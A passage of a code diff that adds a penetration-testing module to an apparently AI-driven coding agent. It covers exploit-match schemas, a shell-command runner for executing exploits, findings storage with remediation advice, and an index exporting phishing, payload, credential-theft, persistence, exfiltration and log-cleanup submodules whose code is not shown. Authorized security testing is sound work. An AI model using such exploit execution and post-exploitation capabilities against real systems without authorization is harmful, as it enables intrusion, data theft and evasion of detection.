+    lines.push(`  Exploit: ${match.exploitID}`)
+    lines.push(`  Status: ${match.status}`)
+    if (match.cve?.length) lines.push(`  CVE: ${match.cve.join(", ")}`)
+  }
+
+  return {
+    title: `${matches.length} exploit match(es)`,
+    output: lines.join("\n"),
+    metadata: { action: "list", count: matches.length, status: "completed" },
+  }
+}
+
+/**
+ * Run command and capture output.
+ */
+async function runCommand(command: string, timeout: number): Promise<string> {
+  return new Promise((resolve, reject) => {
+    let stdout = ""
+    let stderr = ""
+
+    const proc = spawn(command, {
+      shell: true,
+      cwd: Instance.directory,
+      stdio: ["ignore", "pipe", "pipe"],
+    })
+
+    proc.stdout?.on("data", (chunk: Buffer) => {
+      stdout += chunk.toString()
+    })
+
+    proc.stderr?.on("data", (chunk: Buffer) => {
+      stderr += chunk.toString()
+    })
+
+    const timer = setTimeout(() => {
+      proc.kill("SIGTERM")
+      reject(new Error(`Command timed out after ${timeout}ms`))
+    }, timeout)
+
+    proc.once("exit", (code) => {
+      clearTimeout(timer)
+      if (code === 0 || stdout.length > 0) {
+        resolve(stdout)
+      } else {
+        reject(new Error(stderr || `Command failed with code ${code}`))
+      }
+    })
+
+    proc.once("error", (err) => {
+      clearTimeout(timer)
+      reject(err)
+    })
+  })
+}
diff --git a/packages/opencode/src/pentest/exploits/types.ts b/packages/opencode/src/pentest/exploits/types.ts
new file mode 100644
index 00000000000..1e5f0c459a8
--- /dev/null
+++ b/packages/opencode/src/pentest/exploits/types.ts
@@ -0,0 +1,226 @@
+/**
+ * @fileoverview Exploit Framework Types
+ *
+ * Zod schemas for exploit data structures including:
+ * - Searchsploit/Exploit-DB entries
+ * - Metasploit modules
+ * - Exploit matches for findings
+ * - Execution results
+ *
+ * @module pentest/exploits/types
+ */
+
+import z from "zod"
+
+export namespace ExploitTypes {
+  /**
+   * Exploit source database
+   */
+  export const ExploitSource = z.enum([
+    "exploit-db",
+    "metasploit",
+    "nuclei",
+    "github",
+    "manual",
+  ])
+  export type ExploitSource = z.infer<typeof ExploitSource>
+
+  /**
+   * Metasploit module rank
+   */
+  export const ExploitRank = z.enum([
+    "excellent",
+    "great",
+    "good",
+    "normal",
+    "average",
+    "low",
+    "manual",
+  ])
+  export type ExploitRank = z.infer<typeof ExploitRank>
+
+  /**
+   * Exploit type classification
+   */
+  export const ExploitType = z.enum([
+    "remote",
+    "local",
+    "webapps",
+    "dos",
+    "shellcode",
+    "papers",
+    "auxiliary",
+    "post",
+    "encoder",
+    "nop",
+  ])
+  export type ExploitType = z.infer<typeof ExploitType>
+
+  /**
+   * Target platform
+   */
+  export const Platform = z.enum([
+    "linux",
+    "windows",
+    "macos",
+    "unix",
+    "freebsd",
+    "solaris",
+    "android",
+    "ios",
+    "multi",
+    "hardware",
+    "unknown",
+  ])
+  export type Platform = z.infer<typeof Platform>
+
+  /**
+   * Match confidence level
+   */
+  export const Confidence = z.enum(["high", "medium", "low"])
+  export type Confidence = z.infer<typeof Confidence>
+
+  /**
+   * Match status
+   */
+  export const MatchStatus = z.enum([
+    "suggested",
+    "verified",
+    "tested",
+    "dismissed",
+  ])
+  export type MatchStatus = z.infer<typeof MatchStatus>
+
+  /**
+   * Searchsploit entry from Exploit-DB
+   */
+  export const SearchsploitEntry = z.object({
+    id: z.string(),
+    title: z.string(),
+    path: z.string(),
+    date: z.string().optional(),
+    author: z.string().optional(),
+    type: ExploitType.optional(),
+    platform: Platform.optional(),
+    port: z.number().optional(),
+    cve: z.array(z.string()).optional(),
+    verified: z.boolean().optional(),
+    codes: z
+      .object({
+        cve: z.array(z.string()).optional(),
+        osvdb: z.array(z.string()).optional(),
+        edb: z.string().optional(),
+      })
+      .optional(),
+  })
+  export type SearchsploitEntry = z.infer<typeof SearchsploitEntry>
+
+  /**
+   * Searchsploit search result
+   */
+  export const SearchsploitResult = z.object({
+    query: z.string(),
+    exploits: z.array(SearchsploitEntry),
+    shellcodes: z.array(SearchsploitEntry).optional(),
+    papers: z.array(SearchsploitEntry).optional(),
+    timestamp: z.number(),
+  })
+  export type SearchsploitResult = z.infer<typeof SearchsploitResult>
+
+  /**
+   * Metasploit module option
+   */
+  export const ModuleOption = z.object({
+    name: z.string(),
+    required: z.boolean(),
+    default: z.any().optional(),
+    description: z.string().optional(),
+  })
+  export type ModuleOption = z.infer<typeof ModuleOption>
+
+  /**
+   * Metasploit module information
+   */
+  export const MetasploitModule = z.object({
+    name: z.string(),
+    fullname: z.string().optional(),
+    type: ExploitType,
+    rank: ExploitRank.optional(),
+    disclosure_date: z.string().optional(),
+    description: z.string().optional(),
+    author: z.array(z.string()).optional(),
+    references: z.array(z.string()).optional(),
+    cve: z.array(z.string()).optional(),
+    platforms: z.array(Platform).optional(),
+    targets: z.array(z.string()).optional(),
+    options: z.array(ModuleOption).optional(),
+    check: z.boolean().optional(),
+    privileged: z.boolean().optional(),
+  })
+  export type MetasploitModule = z.infer<typeof MetasploitModule>
+
+  /**
+   * Metasploit search result
+   */
+  export const MetasploitSearchResult = z.object({
+    query: z.string(),
+    modules: z.array(MetasploitModule),
+    timestamp: z.number(),
+  })
+  export type MetasploitSearchResult = z.infer<typeof MetasploitSearchResult>
+
+  /**
+   * Match between a finding and potential exploit
+   */
+  export const ExploitMatch = z.object({
+    id: z.string(),
+    findingID: z.string(),
+    source: ExploitSource,
+    exploitID: z.string(),
+    title: z.string(),
+    description: z.string().optional(),
+    type: ExploitType.optional(),
+    rank: ExploitRank.optional(),
+    confidence: Confidence,
+    matchReason: z.string(),
+    cve: z.array(z.string()).optional(),
+    requiresAuth: z.boolean().optional(),
+    requiresInteraction: z.boolean().optional(),
+    url: z.string().optional(),
+    path: z.string().optional(),
+    createdAt: z.number(),
+    verifiedAt: z.number().optional(),
+    status: MatchStatus.default("suggested"),
+  })
+  export type ExploitMatch = z.infer<typeof ExploitMatch>
+
+  /**
+   * Execution status
+   */
+  export const ExecutionStatus = z.enum([
+    "success",
+    "failed",
+    "error",
+    "dry_run",
+  ])
+  export type ExecutionStatus = z.infer<typeof ExecutionStatus>
+
+  /**
+   * Exploit execution result
+   */
+  export const ExploitExecutionResult = z.object({
+    id: z.string(),
+    matchID: z.string(),
+    target: z.string(),
+    source: ExploitSource,
+    exploitID: z.string(),
+    status: ExecutionStatus,
+    dryRun: z.boolean(),
+    output: z.string().optional(),
+    error: z.string().optional(),
+    sessionID: z.string().optional(),
+    startTime: z.number(),
+    endTime: z.number(),
+  })
+  export type ExploitExecutionResult = z.infer<typeof ExploitExecutionResult>
+}
diff --git a/packages/opencode/src/pentest/findings.ts b/packages/opencode/src/pentest/findings.ts
new file mode 100644
index 00000000000..dc6c8a31684
--- /dev/null
+++ b/packages/opencode/src/pentest/findings.ts
@@ -0,0 +1,480 @@
+/**
+ * @fileoverview Findings Storage Module
+ *
+ * Manages storage and retrieval of security findings from pentest scans.
+ * Supports file-based persistence and in-memory storage for testing.
+ *
+ * @module pentest/findings
+ */
+
+import { PentestTypes } from "./types"
+import { Storage } from "../storage/storage"
+import { Bus } from "../bus"
+import { Log } from "../util/log"
+import { randomBytes } from "crypto"
+
+export namespace Findings {
+  const log = Log.create({ service: "pentest.findings" })
+
+  /** In-memory buffer for findings (testing/development) */
+  const memoryBuffer: PentestTypes.Finding[] = []
+
+  /** In-memory buffer for scan results */
+  const scanBuffer: PentestTypes.ScanResult[] = []
+
+  /**
+   * Generate a unique ID for findings/scans.
+   */
+  function generateId(prefix: string): string {
+    const timestamp = Date.now().toString(36)
+    const random = randomBytes(8).toString("hex")
+    return `${prefix}_${timestamp}_${random}`
+  }
+
+  /**
+   * Storage configuration for findings.
+   */
+  export interface StorageConfig {
+    /** Storage mode: file or memory */
+    storage?: "file" | "memory"
+  }
+
+  /**
+   * Create a new finding from scan analysis.
+   *
+   * @param input - Finding data (without id and timestamps)
+   * @param config - Storage configuration
+   * @returns Created finding with generated id
+   *
+   * @example
+   * ```typescript
+   * const finding = await Findings.create({
+   *   sessionID: "session_123",
+   *   title: "SSH Service Exposed",
+   *   description: "SSH service is running on port 22",
+   *   severity: "medium",
+   *   status: "open",
+   *   target: "192.168.1.1",
+   *   port: 22,
+   *   protocol: "tcp",
+   *   service: "ssh",
+   * })
+   * ```
+   */
+  export async function create(
+    input: Omit<PentestTypes.Finding, "id" | "createdAt" | "updatedAt">,
+    config: StorageConfig = {}
+  ): Promise<PentestTypes.Finding> {
+    const id = generateId("finding")
+
+    const finding: PentestTypes.Finding = {
+      ...input,
+      id,
+      createdAt: Date.now(),
+    }
+
+    const validated = PentestTypes.Finding.parse(finding)
+
+    if (config.storage === "memory") {
+      memoryBuffer.push(validated)
+    } else {
+      await Storage.write(["pentest", "findings", validated.id], validated)
+      // Publish event only in file storage mode (requires instance context)
+      try {
+        Bus.publish(PentestTypes.Event.FindingCreated, { finding: validated })
+      } catch {
+        // Ignore bus errors if no instance context
+      }
+    }
+
+    log.info("Finding created", {
+      id: validated.id,
+      title: validated.title,
+      severity: validated.severity,
+      target: validated.target,
+    })
+
+    return validated
+  }
+
+  /**
+   * Update an existing finding.
+   *
+   * @param id - Finding ID to update
+   * @param updates - Fields to update
+   * @param config - Storage configuration
+   * @returns Updated finding or null if not found
+   */
+  export async function update(
+    id: string,
+    updates: Partial<Omit<PentestTypes.Finding, "id" | "createdAt">>,
+    config: StorageConfig = {}
+  ): Promise<PentestTypes.Finding | null> {
+    const existing = await get(id, config)
+    if (!existing) return null
+
+    const updated: PentestTypes.Finding = {
+      ...existing,
+      ...updates,
+      updatedAt: Date.now(),
+    }
+
+    const validated = PentestTypes.Finding.parse(updated)
+
+    if (config.storage === "memory") {
+      const idx = memoryBuffer.findIndex((f) => f.id === id)
+      if (idx >= 0) memoryBuffer[idx] = validated
+    } else {
+      await Storage.write(["pentest", "findings", id], validated)
+    }
+
+    log.info("Finding updated", { id, updates: Object.keys(updates) })
+
+    // Publish event only in file storage mode
+    if (config.storage !== "memory") {
+      try {
+        Bus.publish(PentestTypes.Event.FindingUpdated, { finding: validated })
+      } catch {
+        // Ignore bus errors if no instance context
+      }
+    }
+
+    return validated
+  }
+
+  /**
+   * Get a finding by ID.
+   *
+   * @param id - Finding ID
+   * @param config - Storage configuration
+   * @returns Finding or null if not found
+   */
+  export async function get(id: string, config: StorageConfig = {}): Promise<PentestTypes.Finding | null> {
+    if (config.storage === "memory") {
+      return memoryBuffer.find((f) => f.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<PentestTypes.Finding>(["pentest", "findings", id])
+      return PentestTypes.Finding.parse(data)
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * List findings with optional filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of findings
+   */
+  export async function list(
+    config: StorageConfig = {},
+    filters?: {
+      sessionID?: string
+      scanID?: string
+      severity?: PentestTypes.Severity
+      status?: PentestTypes.FindingStatus
+      target?: string
+      limit?: number
+    }
+  ): Promise<PentestTypes.Finding[]> {
+    let findings: PentestTypes.Finding[]
+
+    if (config.storage === "memory") {
+      findings = [...memoryBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "findings"])
+      findings = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<PentestTypes.Finding>(key)
+          findings.push(PentestTypes.Finding.parse(data))
+        } catch {
+          log.error("Failed to parse finding file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters) {
+      if (filters.sessionID) findings = findings.filter((f) => f.sessionID === filters.sessionID)
+      if (filters.scanID) findings = findings.filter((f) => f.scanID === filters.scanID)
+      if (filters.severity) findings = findings.filter((f) => f.severity === filters.severity)
+      if (filters.status) findings = findings.filter((f) => f.status === filters.status)
+      if (filters.target) findings = findings.filter((f) => f.target === filters.target)
+    }
+
+    // Sort by creation time (newest first)
+    findings.sort((a, b) => b.createdAt - a.createdAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      findings = findings.slice(0, filters.limit)
+    }
+
+    return findings
+  }
+
+  /**
+   * Delete a finding.
+   *
+   * @param id - Finding ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function remove(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = memoryBuffer.findIndex((f) => f.id === id)
+      if (idx >= 0) {
+        memoryBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "findings", id])
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Save a scan result.
+   *
+   * @param result - Scan result to save
+   * @param config - Storage configuration
+   */
+  export async function saveScan(result: PentestTypes.ScanResult, config: StorageConfig = {}): Promise<void> {
+    const validated = PentestTypes.ScanResult.parse(result)
+
+    if (config.storage === "memory") {
+      scanBuffer.push(validated)
+    } else {
+      await Storage.write(["pentest", "scans", validated.id], validated)
+    }
+
+    log.info("Scan result saved", { id: validated.id, target: validated.target })
+
+    // Publish event only in file storage mode
+    if (config.storage !== "memory") {
+      try {
+        Bus.publish(PentestTypes.Event.ScanCompleted, { scan: validated })
+      } catch {
+        // Ignore bus errors if no instance context
+      }
+    }
+  }
+
+  /**
+   * Get a scan result by ID.
+   *
+   * @param id - Scan ID
+   * @param config - Storage configuration
+   * @returns Scan result or null
+   */
+  export async function getScan(id: string, config: StorageConfig = {}): Promise<PentestTypes.ScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<PentestTypes.ScanResult>(["pentest", "scans", id])
+      return PentestTypes.ScanResult.parse(data)
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * List scan results with optional filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of scan results
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      sessionID?: string
+      target?: string
+      scanType?: PentestTypes.ScanType
+      limit?: number
+    }
+  ): Promise<PentestTypes.ScanResult[]> {
+    let scans: PentestTypes.ScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<PentestTypes.ScanResult>(key)
+          scans.push(PentestTypes.ScanResult.parse(data))
+        } catch {
+          log.error("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters) {
+      if (filters.sessionID) scans = scans.filter((s) => s.sessionID === filters.sessionID)
+      if (filters.target) scans = scans.filter((s) => s.target === filters.target)
+      if (filters.scanType) scans = scans.filter((s) => s.scanType === filters.scanType)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startTime - a.startTime)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Generate findings from scan results.
+   * Analyzes ports and services to create security findings.
+   *
+   * @param scan - Scan result to analyze
+   * @param config - Storage configuration
+   * @returns Array of created findings
+   */
+  export async function analyzeAndCreateFindings(
+    scan: PentestTypes.ScanResult,
+    config: StorageConfig = {}
+  ): Promise<PentestTypes.Finding[]> {
+    const findings: PentestTypes.Finding[] = []
+
+    for (const host of scan.hosts) {
+      if (host.status !== "up") continue
+
+      for (const port of host.ports) {
+        if (port.state !== "open") continue
+
+        // Check for interesting findings
+        const finding = await analyzePort(host, port, scan, config)
+        if (finding) {
+          findings.push(finding)
+        }
+      }
+    }
+
+    return findings
+  }
+
+  /**
+   * Analyze a single port for security implications.
+   */
+  async function analyzePort(
+    host: PentestTypes.Host,
+    port: PentestTypes.Port,
+    scan: PentestTypes.ScanResult,
+    config: StorageConfig
+  ): Promise<PentestTypes.Finding | null> {
+    const serviceName = port.service?.name || "unknown"
+
+    // Define interesting services and their security implications
+    const interestingServices: Record<string, { severity: PentestTypes.Severity; description: string; remediation: string }> = {
+      ssh: {
+        severity: "info",
+        description: "SSH service detected. Ensure strong authentication is configured.",
+        remediation: "Use key-based authentication, disable root login, and consider using fail2ban.",
+      },
+      telnet: {
+        severity: "high",
+        description: "Telnet service detected. This is an insecure protocol that transmits data in plaintext.",
+        remediation: "Replace telnet with SSH for secure remote access.",
+      },
+      ftp: {
+        severity: "medium",
+        description: "FTP service detected. Traditional FTP transmits credentials in plaintext.",
+        remediation: "Use SFTP or FTPS instead of plain FTP.",
+      },
+      mysql: {
+        severity: "medium",
+        description: "MySQL database service exposed. Ensure proper access controls are in place.",
+        remediation: "Restrict MySQL to localhost or use firewall rules to limit access.",
+      },
+      "ms-sql-s": {
+        severity: "medium",
+        description: "Microsoft SQL Server exposed. Ensure proper access controls are in place.",
+        remediation: "Restrict access to trusted IPs and use strong authentication.",
+      },
+      http: {
+        severity: "info",
+        description: "HTTP service detected. Check for HTTPS availability.",
+        remediation: "Consider implementing HTTPS for secure communication.",
+      },
+      https: {
+        severity: "info",
+        description: "HTTPS service detected. Verify TLS configuration.",
+        remediation: "Ensure TLS 1.2+ is used and strong cipher suites are configured.",
+      },
+      smb: {
+        severity: "medium",
+        description: "SMB service exposed. This service is commonly targeted by attackers.",
+        remediation: "Ensure SMBv1 is disabled and access is restricted.",
+      },
+      rdp: {
+        severity: "medium",
+        description: "Remote Desktop Protocol exposed. This service is commonly targeted.",
+        remediation: "Use Network Level Authentication and restrict access via firewall.",
+      },
+      vnc: {
+        severity: "medium",
+        description: "VNC service exposed. Ensure strong authentication is configured.",
+        remediation: "Use VNC over SSH tunnel and require authentication.",
+      },
+    }
+
+    // Check if this service is interesting
+    const info = interestingServices[serviceName]
+    if (!info) return null
+
+    // Create finding
+    return create(
+      {
+        sessionID: scan.sessionID,
+        scanID: scan.id,
+        title: `${serviceName.toUpperCase()} Service Exposed on Port ${port.portid}`,
+        description: info.description,
+        severity: info.severity,
+        status: "open",
+        target: host.address,
+        port: port.portid,
+        protocol: port.protocol,
+        service: serviceName,
+        evidence: `Detected ${serviceName} service${port.service?.version ? ` version ${port.service.version}` : ""} on ${host.address}:${port.portid}`,
+        remediation: info.remediation,
+      },
+      config
+    )
+  }
+
+  /**
+   * Clear memory buffers (for testing).
+   */
+  export function clearMemory(): void {
+    memoryBuffer.length = 0
+    scanBuffer.length = 0
+  }
+
+  /**
+   * Get count of findings in memory (for testing).
+   */
+  export function memoryCount(): { findings: number; scans: number } {
+    return {
+      findings: memoryBuffer.length,
+      scans: scanBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/index.ts b/packages/opencode/src/pentest/index.ts
new file mode 100644
index 00000000000..bad5ba2b3dc
--- /dev/null
+++ b/packages/opencode/src/pentest/index.ts
@@ -0,0 +1,192 @@
+/**
+ * @fileoverview Pentest Module
+ *
+ * The pentest module provides penetration testing capabilities for cyxwiz,
+ * including network scanning, vulnerability assessment, and findings management.
+ *
+ * ## Features
+ *
+ * - **Network Scanning**: Nmap integration with XML parsing
+ * - **Multi-Tool Parsers**: Structured output parsing for nikto, nuclei, gobuster, ffuf, sslscan
+ * - **Findings Management**: Store and track security findings
+ * - **Governance Integration**: Scope enforcement for authorized targets
+ * - **LLM Analysis**: AI-powered explanation of scan results
+ * - **Report Generation**: Security assessment reports in Markdown, HTML, JSON
+ * - **Continuous Monitoring**: Scheduled scans with diff detection and alerting
+ *
+ * @module pentest
+ */
+
+// Named exports for direct imports
+export { PentestTypes } from "./types"
+export { NmapParser } from "./nmap-parser"
+export { Findings } from "./findings"
+export { NmapTool } from "./nmap-tool"
+export { SecToolsTool } from "./sectools"
+
+// Parser exports
+export * from "./parsers"
+export { NiktoParser } from "./parsers/nikto"
+export { NucleiParser } from "./parsers/nuclei"
+export { GobusterParser } from "./parsers/gobuster"
+export { FfufParser } from "./parsers/ffuf"
+export { SslscanParser } from "./parsers/sslscan"
+
+// Report exports
+export { Reports } from "./reports"
+export * from "./reports/types"
+export { ReportTool } from "./report-tool"
+
+// Monitoring exports
+export * from "./monitoring"
+export { MonitorTool } from "./monitoring/tool"
+export { Scheduler } from "./monitoring/scheduler"
+export { MonitoringEvents } from "./monitoring/events"
+
+// Exploit exports (namespace export to avoid StorageConfig conflict)
+export * as exploits from "./exploits"
+export { ExploitTool } from "./exploits/tool"
+export { ExploitMatcher } from "./exploits/matcher"
+export { ExploitEvents } from "./exploits/events"
+
+// Web scanner exports (namespace export to avoid StorageConfig, DiscoveryOptions, DiscoveryResult, OrchestratorOptions conflicts)
+export * as webscan from "./webscan"
+export { WebScanTool } from "./webscan/tool"
+export { WebCrawler } from "./webscan/crawler"
+export { ScanOrchestrator } from "./webscan/orchestrator"
+export { WebScanEvents } from "./webscan/events"
+
+// API scanner exports (namespace export to avoid StorageConfig, DiscoveryOptions, DiscoveryResult, OrchestratorOptions conflicts)
+export * as apiscan from "./apiscan"
+export { ApiScanTool } from "./apiscan/tool"
+export { ApiDiscovery } from "./apiscan/discovery"
+export { ApiScanOrchestrator } from "./apiscan/orchestrator"
+export { ApiScanEvents } from "./apiscan/events"
+
+// Network scanner exports (namespace export to avoid StorageConfig, DiscoveryOptions, DiscoveryResult, OrchestratorOptions conflicts)
+export * as netscan from "./netscan"
+export { NetScanTool } from "./netscan/tool"
+export { NetScanOrchestrator } from "./netscan/orchestrator"
+export { NetScanEvents } from "./netscan/events"
+export { NetScanProfiles } from "./netscan/profiles"
+export { NetScanStorage } from "./netscan/storage"
+
+// Cloud scanner exports (namespace export to avoid StorageConfig, DiscoveryOptions, DiscoveryResult, OrchestratorOptions conflicts)
+export * as cloudscan from "./cloudscan"
+export { CloudScanTool } from "./cloudscan/tool"
+export { CloudScanOrchestrator } from "./cloudscan/orchestrator"
+export { CloudScanEvents } from "./cloudscan/events"
+export { CloudScanProfiles } from "./cloudscan/profiles"
+export { CloudScanStorage } from "./cloudscan/storage"
+export { CloudDiscovery } from "./cloudscan/discovery"
+export { ComplianceChecker } from "./cloudscan/compliance"
+
+// CVE lookup exports (namespace export to avoid potential conflicts)
+export * as cve from "./cve"
+export { CVETool } from "./cve/tool"
+export { CVELookup } from "./cve/lookup"
+export { CVECache } from "./cve/cache"
+export { CVEEnricher } from "./cve/enricher"
+export { CVETypes } from "./cve/types"
+
+// Container scanner exports (namespace export to avoid StorageConfig, OrchestratorOptions conflicts)
+export * as containerscan from "./containerscan"
+export { ContainerScanTool } from "./containerscan/tool"
+export { ContainerScanOrchestrator } from "./containerscan/orchestrator"
+export { ContainerScanEvents } from "./containerscan/events"
+export { ContainerScanProfiles } from "./containerscan/profiles"
+export { ContainerScanStorage } from "./containerscan/storage"
+export { ContainerScanTypes } from "./containerscan/types"
+export { TrivyParser, GrypeParser, SyftParser, KubeauditParser } from "./containerscan/parsers"
+export { DockerImages, DockerContainers, DockerConfig, DockerSecrets } from "./containerscan/docker"
+export {
+  KubernetesCluster,
+  KubernetesPods,
+  KubernetesRBAC,
+  KubernetesNetwork,
+  KubernetesSecrets,
+  KubernetesAdmission,
+} from "./containerscan/kubernetes"
+export { RegistryScanner, DockerHub, AWSECR, AzureACR, GoogleGCR } from "./containerscan/registry"
+
+// Mobile scanner exports (namespace export to avoid StorageConfig, OrchestratorOptions conflicts)
+export * as mobilescan from "./mobilescan"
+export { MobileScanTool } from "./mobilescan/tool"
+export { MobileScanOrchestrator } from "./mobilescan/orchestrator"
+export { MobileScanEvents } from "./mobilescan/events"
+export { MobileScanProfiles } from "./mobilescan/profiles"
+export { MobileScanStorage } from "./mobilescan/storage"
+export { MobileScanTypes } from "./mobilescan/types"
+export { ApktoolParser, JadxParser, MobsfParser, AndroguardParser } from "./mobilescan/parsers"
+export { ManifestAnalyzer, PermissionAnalyzer, ComponentAnalyzer, AndroidSecurityAnalyzer } from "./mobilescan/android"
+export { PlistAnalyzer, iOSSecurityAnalyzer } from "./mobilescan/ios"
+export {
+  SSLPinningDetector,
+  RootDetector,
+  ObfuscationAnalyzer,
+  ApiKeyExtractor,
+  UrlExtractor,
+} from "./mobilescan/common"
+
+// Wireless scanner exports (namespace export to avoid StorageConfig, OrchestratorOptions conflicts)
+export * as wirelessscan from "./wirelessscan"
+export { WirelessScanTool } from "./wirelessscan/tool"
+export { WirelessScanOrchestrator } from "./wirelessscan/orchestrator"
+export { WirelessScanEvents } from "./wirelessscan/events"
+export { WirelessScanProfiles } from "./wirelessscan/profiles"
+export { WirelessScanStorage } from "./wirelessscan/storage"
+export { WirelessScanTypes } from "./wirelessscan/types"
+export { AircrackParser, KismetParser, BettercapParser, UbertoothParser, HcxToolsParser } from "./wirelessscan/parsers"
+export { WiFiDiscovery, WiFiSecurity, WiFiRogueAP, WiFiClients, WiFiHandshake, WiFiDeauth } from "./wirelessscan/wifi"
+export {
+  BluetoothDiscovery,
+  BluetoothBLE,
+  BluetoothClassic,
+  BluetoothProfiles,
+  BluetoothVulnerabilities,
+} from "./wirelessscan/bluetooth"
+export { RFIDDiscovery, RFIDReaders, RFIDCards, RFIDCloning, RFIDVulnerabilities } from "./wirelessscan/rfid"
+
+// Social engineering toolkit exports (namespace export to avoid conflicts)
+export * as soceng from "./soceng"
+export { SocEngTool } from "./soceng/tool"
+export { SocEngOrchestrator } from "./soceng/orchestrator"
+export { SocEngEvents } from "./soceng/events"
+export { SocEngProfiles } from "./soceng/profiles"
+export { SocEngStorage } from "./soceng/storage"
+export { SocEngTypes } from "./soceng/types"
+export { EmailGenerator, EmailSpoof, EmailHeaders, EmailValidation } from "./soceng/email"
+export { PhishingCampaigns, PhishingTemplates, PhishingTracking, PhishingLanding, PhishingPayloads } from "./soceng/phishing"
+export { PretextingScenarios, PretextingPersonas, PretextingScripts, PretextingOSINT } from "./soceng/pretexting"
+export { USBPayloads, DocumentPayloads, MacroPayloads, HTAPayloads } from "./soceng/payloads"
+export { EmailRecon, OrgRecon, SocialRecon } from "./soceng/recon"
+export { AwarenessTraining, AwarenessMetrics, AwarenessReporting } from "./soceng/awareness"
+
+// Post-exploitation framework exports (namespace export to avoid StorageConfig conflicts)
+export * as postexploit from "./postexploit"
+export { PostExploitTool } from "./postexploit/tool"
+export { PostExploitOrchestrator } from "./postexploit/orchestrator"
+export { PostExploitEvents } from "./postexploit/events"
+export { PostExploitProfiles } from "./postexploit/profiles"
+export { PostExploitStorage } from "./postexploit/storage"
+export { PostExploitTypes } from "./postexploit/types"
+export { Privesc, LinuxPrivesc, WindowsPrivesc } from "./postexploit/privesc"
+export { Lateral, LateralDiscovery, LateralMethods, LateralPaths } from "./postexploit/lateral"
+export { Creds, CredentialDiscovery, LinuxCreds, WindowsCreds } from "./postexploit/creds"
+export { Persistence, PersistenceCatalog, LinuxPersistence, WindowsPersistence } from "./postexploit/persistence"
+export { Exfil, DataTargets, ExfilChannels } from "./postexploit/exfil"
+export { Cleanup, ArtifactTracking, LogCleanup, CleanupChecklist } from "./postexploit/cleanup"
+export { Parsers, LinPEASParser, WinPEASParser } from "./postexploit/parsers"
+
+// CI/CD security scanner exports (namespace export to avoid StorageConfig, OrchestratorOptions conflicts)
+export * as cicd from "./cicd"
+export { CICDTool } from "./cicd/tool"
+export { CICDOrchestrator } from "./cicd/orchestrator"
+export { CICDEvents } from "./cicd/events"
+export { CICDProfiles } from "./cicd/profiles"
+export { CICDStorage } from "./cicd/storage"
+export { CICDTypes } from "./cicd/types"
+export { SecurityGates } from "./cicd/gates"
+export { GitHubProvider, GitLabProvider, JenkinsProvider } from "./cicd/providers"
+export { SecretsCheck, PermissionsCheck, InjectionCheck, SupplyChainCheck } from "./cicd/checks"
+export { SemgrepIntegration, GitleaksIntegration, SASTOrchestrator } from "./cicd/sast"
diff --git a/packages/opencode/src/pentest/mobilescan/android/components.ts b/packages/opencode/src/pentest/mobilescan/android/components.ts
new file mode 100644
index 00000000000..c8c34810947
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/android/components.ts
@@ -0,0 +1,416 @@
+/**
+ * @fileoverview Android Component Analysis
+ *
+ * Analyzes Android components (Activities, Services, Receivers, Providers)
+ * for security issues like exported components and intent vulnerabilities.
+ *
+ * @module pentest/mobilescan/android/components
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "mobilescan.android.components" })
+
+/**
+ * Component analyzer namespace.
+ */
+export namespace ComponentAnalyzer {
+  /**
+   * Dangerous intent actions.
+   */
+  export const DANGEROUS_ACTIONS = [
+    "android.intent.action.BOOT_COMPLETED",
+    "android.intent.action.PACKAGE_ADDED",
+    "android.intent.action.PACKAGE_REPLACED",
+    "android.intent.action.USER_PRESENT",
+    "android.intent.action.NEW_OUTGOING_CALL",
+    "android.provider.Telephony.SMS_RECEIVED",
+    "android.provider.Telephony.WAP_PUSH_RECEIVED",
+  ]
+
+  /**
+   * Sensitive data schemes.
+   */
+  export const SENSITIVE_SCHEMES = ["file", "content", "javascript"]
+
+  /**
+   * Analyze all components.
+   */
+  export function analyze(
+    manifest: MobileScanTypes.AndroidManifest,
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    log.info("Analyzing Android components", { packageName: manifest.packageName })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    // Analyze activities
+    findings.push(...analyzeActivities(manifest.activities, scanId, appId))
+
+    // Analyze services
+    findings.push(...analyzeServices(manifest.services, scanId, appId))
+
+    // Analyze receivers
+    findings.push(...analyzeReceivers(manifest.receivers, scanId, appId))
+
+    // Analyze providers
+    findings.push(...analyzeProviders(manifest.providers, scanId, appId))
+
+    return findings
+  }
+
+  /**
+   * Analyze activities.
+   */
+  function analyzeActivities(
+    activities: MobileScanTypes.AndroidComponent[],
+    scanId: string,
+    appId: string
+  ): MobileScanTypes.MobileFinding[] {
+    const findings: MobileScanTypes.MobileFinding[] = []
+
+    for (const activity of activities) {
+      // Check exported without permission
